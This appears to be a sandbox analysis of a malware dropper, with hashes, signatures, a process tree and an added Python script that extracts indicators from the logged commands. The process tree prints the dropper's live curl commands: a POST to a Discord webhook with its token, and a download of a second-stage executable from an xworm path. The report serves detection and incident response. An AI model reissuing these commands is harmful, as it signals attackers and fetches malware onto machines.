Analysis

max time kernel: 121s
max time network: 122s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 15-05-2024 09:25

Static task: static1 (1 signature)
Behavioral task: behavioral1
  Sample: Dropper.exe
  Resource: win7-20240508-en (windows7-x64)
  2 signatures, 150 seconds
General

Target: Dropper.exe
Size: 130KB
MD5: f5506ffbf34168afb8dc1d12d08a38fc
SHA1: 4062954622406a6e29c52d31dea192c79f7fe7bf
SHA256: 018c780a107fe4c716e1f20814f821bee4571f2059b8efed53fafe31cea3d671
SHA512: e455aa92a43b0946945ee22d93b50ed9dcd7dc0c2f0e02132d4bcb1c0b67c90a132c7372f293c2292a925564cbc44050fa4830934aeb4422147905a2462716ed
SSDEEP: 1536:K1KTRyrsnRpBgO7JL+97UCnDCZI31QocZaROflkfe970KqwGzlbP3BEA89wtHc:K1U4whj67KqH5bP8B
Score: 3/10
Malware Config
Signatures

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Suspicious use of WriteProcessMemory (8 IoCs)
  Processes:
  description                  source PID  source process  target PID  target process
  wrote to memory (4 events)   3048        Dropper.exe     1132        cmd.exe
  wrote to memory (4 events)   3048        Dropper.exe     2728        cmd.exe
Processes

C:\Users\Admin\AppData\Local\Temp\Dropper.exe
  "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
  PID: 3048 (Suspicious use of WriteProcessMemory)

  C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
    PID: 1132

  C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/yar.exe --output C:\Users\Admin\yar.exe
    PID: 2728
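The process tree is the security-relevant part of this report. The dropper itself does little; it shells out twice through cmd.exe /c to the curl binary present on the sandbox image: the first child POSTs an execution notice (the logged-in user name) to a Discord webhook, the second fetches yar.exe from a path named xworm on recte.host and writes it into the user profile. Both children are recorded as C:\Windows\SysWOW64\cmd.exe although the command line names System32; the sample is tagged arch:x86, so this is the WoW64 file-system redirection a 32-bit process gets. The following Python is an added example, not part of the sandbox output: it parses the two recorded command lines (copied from the tree above, with the first one's long list of -H headers trimmed), extracts the IOCs a responder would want (webhook ID, download URL, dropped path) and tags the behaviours. The tag names, the Discord host list and the executable-extension list are this example's own choices.

```python
import re
from urllib.parse import urlparse

# Constructed sample input: the two cmd.exe command lines from the process
# tree above; the first one's long run of -H headers is trimmed.
SAMPLE_CMDLINES = [
    '"C:\\Windows\\System32\\cmd.exe" /c curl "https://discord.com/api/webhooks/'
    '1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv"'
    ' -X POST -H "Content-Type: application/json" -H "Origin: https://discohook.org"'
    ' --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""attachments"":[]}"',
    '"C:\\Windows\\System32\\cmd.exe" /c curl https://recte.host/xworm/yar.exe'
    ' --output C:\\Users\\Admin\\yar.exe',
]

# A Windows argument is a double-quoted run ("" escapes a quote inside it) or
# a run of non-whitespace; enough for the cmd.exe /c curl ... shape seen here.
_TOKEN = re.compile(r'"(?:[^"]|"")*"|\S+')
_DATA_OPTS = {"-d", "--data", "--data-raw", "--data-binary", "--data-urlencode"}
# curl options that consume the following token as their value (example's own list)
_VALUE_OPTS = _DATA_OPTS | {"-X", "--request", "-H", "--header", "-o", "--output",
                            "-A", "--user-agent", "-e", "--referer", "-u", "--user"}
_DISCORD_HOSTS = {"discord.com", "discordapp.com", "canary.discord.com", "ptb.discord.com"}
_EXEC_EXT = re.compile(r"\.(exe|dll|scr|ps1|bat|cmd|vbs|js)$", re.I)


def tokenize(cmdline):
    """Split a Windows command line into unquoted arguments."""
    args = []
    for tok in _TOKEN.findall(cmdline):
        if len(tok) >= 2 and tok[0] == '"' and tok[-1] == '"':
            tok = tok[1:-1].replace('""', '"')
        args.append(tok)
    return args


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def parse_curl(args):
    """Return (method, url, output_path, has_body) for a curl call, else None."""
    idx = next((i for i, a in enumerate(args) if _basename(a) in ("curl", "curl.exe")), None)
    if idx is None:
        return None
    method, url, output, has_body = None, None, None, False
    i = idx + 1
    while i < len(args):
        a = args[i]
        if a in _VALUE_OPTS:
            val = args[i + 1] if i + 1 < len(args) else ""
            if a in ("-X", "--request"):
                method = val.upper()
            elif a in ("-o", "--output"):
                output = val
            elif a in _DATA_OPTS:
                has_body = True
            i += 2
            continue
        if not a.startswith("-"):
            url = a  # the positional argument is the URL
        i += 1
    if method is None:  # curl defaults to POST once a body is given
        method = "POST" if has_body else "GET"
    return method, url, output, has_body


def analyze_cmdline(cmdline):
    """Extract IOCs from one command line and tag the behaviours it shows."""
    args = tokenize(cmdline)
    result = {"image": args[0] if args else "", "url": None, "method": None,
              "output": None, "webhook_id": None, "tags": []}
    parsed = parse_curl(args)
    if parsed is None:
        return result
    method, url, output, has_body = parsed
    result.update(url=url, method=method, output=output)
    tags = result["tags"]
    if _basename(result["image"]) == "cmd.exe":
        tags.append("curl_spawned_by_cmd")  # LOLBin curl launched via cmd /c
    u = urlparse(url or "")
    host, path = (u.hostname or ""), u.path
    if host in _DISCORD_HOSTS and path.startswith("/api/webhooks/"):
        parts = path.split("/")  # ['', 'api', 'webhooks', '<id>', '<token>']
        if len(parts) > 3 and parts[3].isdigit():
            result["webhook_id"] = parts[3]  # the ID to report for takedown
        if method == "POST" or has_body:
            tags.append("discord_webhook_post")  # execution beacon / exfil channel
    if url and output:
        tags.append("remote_file_download")
        if re.match(r"(?i)^c:\\users\\", output) or re.search(r"(?i)%(appdata|temp)%", output):
            tags.append("download_to_user_profile")
        if _EXEC_EXT.search(output) or _EXEC_EXT.search(path):
            tags.append("executable_download")  # second stage written to disk
    return result


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(analyze_cmdline(line))
```

Run stand-alone it prints one record per child process: the first resolves to a POST to discord.com with webhook ID 1239677728240832532, the second to a GET of https://recte.host/xworm/yar.exe written to C:\Users\Admin\yar.exe. The webhook ID and token are what Discord needs to disable the hook; the download URL, the dropped path and the hash set in the General section are the indicators to block and hunt for. A production rule would key on the same two conditions (curl/cmd.exe parent chain with a discord.com/api/webhooks/ URL, and curl --output into a user-writable directory) rather than on this sample's specific strings.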